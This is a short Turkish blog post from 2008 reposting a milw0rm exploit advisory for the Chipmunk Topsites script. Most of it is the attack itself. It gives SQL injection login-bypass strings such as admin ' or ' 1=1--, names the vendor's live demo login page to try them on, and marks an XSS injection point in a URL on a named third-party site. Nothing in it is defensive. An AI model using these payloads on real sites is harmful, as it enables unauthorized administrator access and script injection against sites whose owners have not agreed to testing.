"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

25 Kasım 2008 Salı

Chipmunk Topsites (Auth Bypass/XSS) Multiple Remote Vulnerabilities

Chipmunk Topsites (Auth Bypass/XSS) Multiple Remote Vulnerabilities

link: http://www.milw0rm.com/exploits/7227

Discovered By: ZoRLu

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu ( or dont write anything )

note: generally admin name: admin


exploit for demo:

http://www.chipmunk-scripts.com/topsites/login.php

username: admin ' or ' 1=1--

passwd: ZoRLu ( or dont write anything )

or

username: zorlu ' or ' 1=1--

passwd: ZoRLu ( or dont write anything )


XSS:

http://www.arcade-classics.net/top100/index.php?start=[XSS]

0 yorum:

 
Dizi